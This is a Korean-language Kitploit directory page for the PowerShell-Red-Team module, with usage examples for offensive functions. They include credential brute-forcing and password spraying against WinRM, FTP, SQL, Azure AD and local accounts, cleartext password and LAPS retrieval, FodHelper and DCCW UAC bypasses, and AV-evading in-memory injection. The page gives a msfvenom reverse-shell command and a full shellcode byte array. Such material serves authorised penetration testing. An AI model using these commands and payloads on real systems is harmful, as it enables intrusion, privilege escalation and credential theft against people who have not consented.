Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PowerShell-Red-Team — 레드 팀원이 작전 중 사용할 수 있는 PowerShell 함수 모음 | Kitploit
도구/GitHubGitHub/tobor88/powershell-red-team
Privilege EscalationPassword AttacksLateral MovementInformation GatheringPenetration TestingRed Teaming
GitHubtobor88/powershell-red-team

PowerShell-Red-Team

레드 팀원이 작전 중 사용할 수 있는 PowerShell 함수 모음

저장소 보기
551922년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PowerShell-Red-Team-Enum

레드 팀 구성원이 컴퓨터에서 데이터를 수집하거나 대상에 접근하는 데 사용할 수 있는 PowerShell 함수 모음입니다. RedTeamEnum 모듈에 포함된 명령어에 대한 ps1 파일을 추가했습니다. 이를 통해 원하는 명령어 하나만 쉽게 찾아 사용할 수 있습니다. 전체 모듈을 원한다면 RedTeamEnum 디렉토리와 내용을 장치에 다운로드한 후 다음 작업을 수행하세요.

root@kitploit:~
C:\PS> robocopy .\RedTeamEnum $env:USERPROFILE\Documents\WindowsPowerShell\Modules\RedTeamEnum *
# 이 명령은 모듈을 쉽게 가져올 수 있는 위치로 복사합니다. OneDrive 동기화를 사용하는 경우 $env:USERPROFILE\OneDrive\Documents\WindowsPowerShell\Modules\RedTeamEnum을 대신 사용해야 할 수 있습니다.

C:\PS> Import-Module -Name RedTeamEnum -Verbose
# 이 명령은 모듈의 모든 명령을 가져옵니다.

C:\PS> Get-Command -Module RedTeamEnum
# 이 명령은 모듈의 모든 명령을 나열합니다.
  • Convert-Base64.ps1은 이름에서 알 수 있듯이 텍스트를 Base64 형식으로 인코딩 및/또는 디코딩하는 함수입니다.
root@kitploit:~
C:\PS> Convert-Base64 -Value "Convert me to base64!" -Encode

C:\PS> Convert-Base64 -Value "Q29udmVydCBtZSB0byBiYXNlNjQh" -Decode
  • Convert-StringToHash.ps1은 문자열 값을 해시 값으로 변환하는 함수입니다.
root@kitploit:~
C:\PS> Convert-StringToHash -String "Convert me to base64!"
C:\PS> Convert-StringToHash -String "Password123" -Encoding UTF8 -Algorithm MD5
# 위 두 예제 모두 문자열 Password123을 MD5 해시 값으로 변환합니다.
  • Convert-SID.ps1은 SID 값을 사용자 이름으로, 사용자 이름을 SID 값으로 변환하는 함수입니다.
root@kitploit:~
C:\PS> Convert-SID -Username tobor
# 위 예제는 tobor의 SID 값을 반환합니다.

C:\PS> Convert-SID -SID S-1-5-21-2860287465-2011404039-792856344-500
# 위 예제는 SID 값을 해당 사용자 이름으로 변환합니다.
  • Test-BruteZipPassword는 비밀번호 파일을 사용하여 7zip을 이용해 암호로 보호된 zip 파일을 무차별 대입하는 함수입니다.
root@kitploit:~
C:\PS> Test-BruteForceZipPassword -PassFile 'C:\Users\USER\Downloads\Applications\pass.txt' -Path 'C:\Users\USER\Downloads\Applications\KiTTY.7z' -ZipExe 'C:\Program Files\7-Zip\7z.exe'
# 이 예제는 pass.txt 파일의 비밀번호를 사용하여 암호로 보호된 KiTTY.7z 파일의 암호를 크랙합니다.
  • Test-BruteForceCredentials는 WinRM을 사용하여 사용자 비밀번호를 무차별 대입하는 함수입니다.
root@kitploit:~
C:\PS> Test-BruteForceCredentials -ComputerName DC01.domain.com -UseSSL -Username 'admin','administrator' -Passwd 'Password123!' -SleepMinutes 5
# 이 예제는 하나의 정의된 비밀번호를 원격 컴퓨터 DC01.domain.com의 admin 및 administrator 사용자 모두에 대해 WinRM over HTTPS를 사용하여 테스트하며, 각 시도 사이에 5분의 시간 간격을 둡니다.

C:\PS> Test-BruteForceCredentials -ComputerName File.domain.com -UserFile C:\Temp\users.txt -PassFile C:\Temp\rockyou.txt
# 이 예제는 rockyou.txt의 모든 비밀번호를 users.txt 파일의 모든 사용자 이름에 대해 시도 간 지연 없이 테스트합니다.
  • Get-LdapInfo는 일반 LDAP 쿼리를 수행하는 매우 자랑스러운 함수입니다. 출력에는 두 개의 속성만 표시되지만, 객체와 관련된 모든 속성은 Select-Object -Property *로 파이프하거나 -Detailed 스위치 매개변수를 사용하여 볼 수 있습니다.
root@kitploit:~
C:\PS> Get-LdapInfo -Detailed -SPNNamedObjects -Domain domain.com -Credential (Get-Credential)
# 위 명령은 domain.com의 반환 객체에 대한 모든 속성을 반환합니다.
#
C:\PS> Get-LdapInfo -DomainControllers | Select-Object -Property 'Name','ms-Mcs-AdmPwd'
# 관리자로 실행하면 로컬 관리자 계정의 LAPS 비밀번호를 반환합니다.
#
C:\PS> Get-LdapInfo -ListUsers | Where-Object -Property SamAccountName -like "user.samname"
# 참고: "-Detailed" 스위치를 포함하고 출력을 Where-Object로 파이프하면 속성이 반환되지 않습니다. 결과의 모든 속성을 표시하려면 아래 형식을 사용해야 합니다.
#
C:\PS> Get-LdapInfo -AllServers | Where-Object -Property LogonCount -gt 1 | Select-Object -Property *

  • Get-NetworkShareInfo는 원격 또는 로컬 컴퓨터에서 사용 가능한 네트워크 공유에 대한 정보를 검색 및/또는 무차별 대입 검색하는 cmdlet입니다.
root@kitploit:~
C:\PS> Get-NetworkShareInfo -ShareName C$
# 위 예제는 로컬 컴퓨터의 C$ 공유에 대한 정보를 반환합니다.
#결과
Name         : C$
InstallDate  :
Description  : Default share
Path         : C:\
ComputerName : TOBORDESKTOP
Status       : OK

C:\PS> Get-NetworkShareInfo -ShareName NETLOGON,SYSVOL,C$ -ComputerName DC01.domain.com, DC02.domain.com, 10.10.10.1
# 위 예제는 3개의 원격 장치 DC01, DC02 및 10.10.10.1에서 NETLOGON, SYSVOL 및 C$를 검색하고 정보를 반환합니다.
  • Test-PrivEsc는 WSUS 업데이트가 HTTP를 통해 권한 상승에 취약한지, 일반 텍스트 자격 증명이 일반적인 위치에 저장되어 있는지, AlwaysInstallElevated가 권한 상승에 취약한지, 따옴표가 없는 서비스 경로가 존재하는지, 서비스에 대한 약한 쓰기 권한 가능성을 열거하는 데 사용할 수 있는 함수입니다.
root@kitploit:~
 C:\PS> Test-PrivEsc
  • Get-InitialEnum은 Windows 운영 체제의 기본 사항을 열거하여 가능한 취약점을 더 잘 파악하는 데 도움이 되는 함수입니다.
root@kitploit:~
 C:\PS> Get-InitialEnum
  • Start-SimpleHTTPServer는 파일 다운로드를 위한 HTTP 서버를 호스팅하는 함수입니다. Python의 SimpleHTTPServer 모듈과 유사하게 설계되었습니다. 웹 서버를 통해 디렉토리를 탐색할 수 없습니다. 호스팅될 다운로드 파일은 이 명령을 실행할 때 현재 디렉토리에 있는 파일입니다.
root@kitploit:~
C:\PS> Start-SimpleHTTPServer
8000 포트에서 HTTP 서버 열기

#또는
C:\PS> Start-SimpleHTTPServer -Port 80
# 80 포트에서 HTTP 서버 열기
  • Invoke-PortScan.ps1은 대상의 가능한 모든 TCP 포트를 스캔하는 함수입니다. 향후 UDP와 포트 범위 정의 기능을 포함하여 개선할 예정입니다. 이 함수는 매우 느리기 때문에 솔직히 사용할 가치가 없습니다. 스레딩은 제 약점이며, 이 함수에서 작업할 계획입니다.
root@kitploit:~
 C:\PS> Invoke-PortScan -IpAddress 192.168.0.1
  • Invoke-PingSweep은 서브넷 범위의 ping 스윕을 수행하는 함수입니다.
root@kitploit:~
C:\PS> Invoke-PingSweep -Subnet 192.168.1.0 -Start 192 -End 224 -Source Singular
# 참고: 소스 매개변수는 IP 소스 라우팅 값이 "Yes"인 경우에만 작동합니다.

C:\PS> Invoke-PingSweep -Subnet 10.0.0.0 -Start 1 -End 20 -Count 2
# Count의 기본값은 1입니다.

C:\PS> Invoke-PingSweep -Subnet 172.16.0.0 -Start 64 -End 128 -Count 3 -Source Multiple
  • Invoke-UseCreds는 침투 테스트 중 획득한 자격 증명을 사용하는 과정을 간소화하기 위해 만든 함수입니다. -Password 대신 -Passwd를 사용하는 이유는 해당 매개변수가 정의될 때 보안 문자열로 구성되어야 하지만, 이 함수에서는 해당 필드에 값을 입력할 때 보안 문자열이 아니기 때문입니다. 값을 설정한 후 보안 문자열로 변환됩니다.
root@kitploit:~
# 아래 명령은 입력된 자격 증명을 사용하여 msf.exe 실행 파일을 tobor 사용자로 실행합니다.
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\msf.exe -Verbose

이 cmdlet은 로컬 컴퓨터의 파일을 원격 컴퓨터에서 실행하는 데에도 사용할 수 있습니다.

root@kitploit:~
# 아래 명령은 입력된 자격 증명을 사용하여 DC01 및 DC02에서 tobor 사용자로 exploit.ps1 실행 파일을 WinRM을 통해 실행합니다.
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\exploit.ps1 -ComputerName "DC01.domain.com","DC02.domain.com"

# 아래 명령은 입력된 자격 증명을 사용하여 DC01 및 DC02에서 tobor 사용자로 exploit.ps1 실행 파일을 WinRM over HTTPS를 통해 실행합니다.
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\exploit.ps1 -ComputerName "DC01.domain.com","DC02.domain.com" -UseSSL
  • Invoke-FodHelperBypass는 UAC 우회가 작동하는지 먼저 테스트한 후 실행하여 권한을 상승시키는 함수입니다. 물론 로컬 관리자 그룹의 구성원이 실행해야 하며, 이 우회는 현재 셸의 권한을 상승시킵니다. 실행할 프로그램을 정의할 수 있으며, msfvenom 페이로드뿐만 아니라 cmd, powershell 또는 명령 실행도 가능합니다.
root@kitploit:~
C:\PS> Invoke-FodHelperBypass -Program "powershell" -Verbose
# 또는
C:\PS> Invoke-FodHelperBypass -Program "cmd /c msf.exe" -Verbose
  • Invoke-InMemoryPayload는 인메모리 주입을 사용한 AV 회피에 사용됩니다. 이를 위해서는 아래 예제와 유사한 명령을 사용하여 msfvenom 페이로드를 생성하고, "[Byte[]] $buf" 변수를 Invoke-InMemoryPayload의 "ShellCode" 매개변수에 입력해야 합니다.
root@kitploit:~
# 사용할 페이로드 생성
msfvenom -p windows/meterpreter/shell_reverse_tcp LHOST=192.168.137.129 LPORT=1337 -f powershell

리스너를 시작하고, 그 값을 "ShellCode" 매개변수에 사용한 후 명령을 실행하여 셸을 획득하세요. 이 작업에는 특정 메모리 보호 기능이 비활성화되어 있어야 합니다. 참고: ShellCode 변수 값 주위에 __큰따옴표가 없음__에 유의하세요. 이는 바이트 배열을 예상하기 때문입니다.

root@kitploit:~
C:\PS> Invoke-InMemoryPayload -Payload 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x5,0x39,0xc0,0xa8,0x89,0x81,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x2,0x0,0x0,0x49,0xb8,0x63,0x6d,0x64,0x0,0x0,0x0,0x0,0x0,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0xd,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x1,0x1,0x48,0x8d,0x44,0x24,0x18,0xc6,0x0,0x68,0x48,0x89,0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0xe,0x41,0xba,0x8,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5 -Verbose

Invoke-InMemoryPayload Image

  • Get-ClearTextPassword는 캐시된 비밀번호, 레지스트리의 SNMP 비밀번호, 자동 로그온 비밀번호, 장치에 저장된 WiFi 비밀번호를 얻는 데 사용됩니다. 저장된 위치에서 현재 사용자의 비밀번호만 가져올 수 있습니다.
root@kitploit:~
Get-ClearTextPassword -All

위 명령은 cmdlet이 가능한 모든 결과를 반환합니다. 개별 위치도 검색할 수 있습니다. 예를 들어

root@kitploit:~
Get-ClearTextPassword -AutoLogon

검색에서 두 개 이상의 위치를 정의할 수 있습니다. 예를 들어

root@kitploit:~
Get-ClearTextPassword -WiFi -SNMP -Chrome -PasswordVault
  • Invoke-AzureEnum.ps1은 Azure 자격 증명을 사용하여 Azure 열거를 수행하고 결과를 파일에 저장하는 데 사용할 수 있습니다.
root@kitploit:~
Invoke-AzureEnum.ps1 -Path 'C:\Temp\enum.txt'
  • Invoke-AzurePasswordSpray는 Azure AD에 대한 자격 증명을 테스트하면서 단일 사용자 또는 여러 사용자에 대해 비밀번호 사전 공격을 수행하는 데 사용할 수 있습니다.
root@kitploit:~
Invoke-AzurePasswordSpray -UserName "[email protected]","[email protected]" -Passwd 'Password123!','asdf123!'
# 이 예제는 정의된 비밀번호를 정의된 사용자 이름 목록에 대해 테스트합니다.

Invoke-AzurePasswordSpray -UserName "[email protected]","[email protected]" -Passwd 'Password123!','asdf123!' -SleepSeconds 60
# 이 예제는 정의된 비밀번호를 정의된 사용자 이름 목록에 대해 테스트하며, 다음 로그인 시도 전에 60초 대기합니다.

Invoke-AzurePasswordSpray -UserName "[email protected]","[email protected]" -Passwd 'Password123!','asdf123!' -SleepSeconds 60 -RoundRobin
# 이 예제는 정의된 비밀번호를 정의된 사용자 이름 목록에 대해 라운드 로빈 방식으로 인증 시도를 수행하며, 각 시도 사이에 60초 대기합니다.

$UserNames = "[email protected]","[email protected]","[email protected]","[email protected]"
$UserNames | Invoke-AzurePasswordSpray -Passwd "Password123!" -RoundRobin
# 이 예제는 정의된 비밀번호를 정의된 사용자 이름 목록에 대해 라운드 로빈 방식으로 테스트합니다.
  • Test-KerberosDoubleHop은 Kerberos 이중 홉에 취약한 컴퓨터, 사용자 및/또는 관리자 계정을 발견하는 데 사용됩니다.
root@kitploit:~
Test-KerberosDoubleHop -All
# 이 예제는 현재 로그인한 도메인 컨트롤러에서 Kerberos 이중 홉에 취약한 컴퓨터, 사용자 및 관리자 AD 개체를 확인하고 표시합니다.

Test-KerberosDoubleHop -Server DC01.domain.com -UserResults
# 이 예제는 WinRM을 사용하여 원격 도메인 컨트롤러 DC01.domain.com에서 Kerberos 이중 홉에 취약한 사용자 AD 개체를 표시합니다.

Test-KerberosDoubleHop -Server DC01.domain.com -UseSSL -AdminResults
# 이 예제는 WinRM over HTTPS를 사용하여 원격 도메인 컨트롤러 DC01.domain.com에서 Kerberos 이중 홉에 취약한 관리자 AD 개체를 표시합니다.

Test-KerberosDoubleHop -ComputerResults -AdminResults
# 이 예제는 현재 로그인한 도메인 컨트롤러에서 Kerberos 이중 홉에 취약한 컴퓨터 및 관리자 AD 개체를 확인하고 표시합니다.
  • Invoke-DccwUACBypass는 관리자 그룹의 구성원인 경우 비밀번호 없이 UAC를 우회하는 데 사용됩니다. 이는 DCCW의 기능을 악용하여 이 작업을 수행합니다. 설정이 이를 허용하지 않으면 이 cmdlet은 실행을 중지합니다. 설정이 이를 허용하면 이에 대한 방어 방법을 알려줍니다.
root@kitploit:~
Invoke-DccwUACBypass -Program "cmd /c start powershell"
# 이 예제는 DCCW UAC 우회 방법을 악용하여 관리자 권한으로 PowerShell을 엽니다.

Invoke-DccwUACBypass -Program "cmd /c start mfs.exe"
# 이 예제는 DCCW UAC 우회 방법을 악용하여 관리자 권한으로 msf.exe 페이로드를 실행합니다.
  • Enable-RDP는 로컬 컴퓨터에서 RDP를 활성화하고, 네트워크 수준 인증을 비활성화하며, 포트 3389에 대한 방화벽 규칙을 활성화하는 데 사용됩니다.
root@kitploit:~
Enable-RDP
  • Test-BruteLocalUserCredential은 로컬 컴퓨터의 로컬 계정 비밀번호를 무차별 대입하는 데 사용됩니다.
root@kitploit:~
Test-BruteLocalUserCredential -Username Administrator -Passwd 'Password123!','Passw0rd1!'
# 이 예제는 두 개의 정의된 비밀번호를 Administrator 사용자 계정에 대해 테스트합니다.

Test-BruteLocalUserCredential -Username Administrator -Passwd (Get-Content -Path C:\Temp\passlist.txt)
# 이 예제는 C:\Temp\passlist.txt 파일의 비밀번호를 Administrator 사용자 계정에 대해 테스트합니다.

$Users = (Get-LocalUser).Name
ForEach $U in $Users) {Test-BruteLocalUserCredential -Username $U -Passwd (Get-Content -Path C:\Temp\passlist.txt)}
# 이 예제는 비밀번호 목록을 모든 로컬 사용자 계정에 대해 테스트합니다.
  • Test-FTPCredential은 FTP 또는 FTPS 서버에 대해 비밀번호를 무차별 대입하는 데 사용됩니다.
root@kitploit:~
Test-FTPCredential -Server FTP.domian.com -Username ftpuser -Passwd 'Password123','Passw0rd1!','password123!' -Port 21 -Protocol FTP
# 이 예제는 정의된 3개의 비밀번호를 FTP.domain.com의 FTP 서버에 있는 ftpuser 계정에 대해 포트 21에서 테스트합니다.

Test-FTPCredential -Server FTP.domian.com -Username ftpuser,admin -Passwd 'Password123','Passw0rd1!','password123!' -Protocol FTPS -Seconds 60
# 이 예제는 정의된 3개의 비밀번호를 FTP.domain.com의 FTP 서버에 있는 admin 및 ftpuser 계정에 대해 포트 21에서 테스트하며, 실패한 시도 사이에 60초 대기합니다.

Test-FTPCredential -Server FTP.domian.com -Username (Get-Content -Path C:\Temp\userlist.txt) -Passwd (Get-Content -Path C:\Temp\passlist.txt)
# 이 예제는 C:\Temp\passlist.txt의 비밀번호를 C:\Temp\userlist.txt 파일에 정의된 모든 사용자에 대해 FTP.domain.com의 FTP 서버에서 포트 21을 통해 테스트하며, 실패한 시도 사이에 1초 대기합니다.
  • Test-SQLCredential은 로컬 또는 원격 SQL 서버에 대해 비밀번호를 무차별 대입하는 데 사용됩니다.
root@kitploit:~
Test-SQLCredential -Server sql.domian.com -Username sa -Passwd 'Password123','Passw0rd1!','password123!' -Port 1433
# 이 예제는 정의된 3개의 비밀번호를 sql.domain.com의 SQL 서버에 있는 sa 계정에 대해 포트 1433에서 테스트합니다.

Test-SQLCredential -Server sql.domian.com -Username sa,admin -Passwd 'Password123','Passw0rd1!','password123!' -Seconds 60
# 이 예제는 정의된 3개의 비밀번호를 sql.domain.com의 SQL 서버에 있는 admin 및 sa 계정에 대해 포트 1433에서 테스트하며, 실패한 시도 사이에 60초 대기합니다.

Test-SQLCredential -Server sql.domian.com -Username (Get-Content -Path C:\Temp\userlist.txt) -Passwd (Get-Content -Path C:\Temp\passlist.txt)
# 이 예제는 C:\Temp\passlist.txt의 비밀번호를 C:\Temp\userlist.txt 파일에 정의된 모든 사용자에 대해 sql.domain.com의 SQL 서버에서 포트 1433을 통해 테스트하며, 실패한 시도 사이에 1초 대기합니다.

Start-Listener, Start-Bind 및 Invoke-ReversePowerShell에 대한 자세한 내용은 https://github.com/tobor88/ReversePowerShell을 참조하세요.

도구 다운로드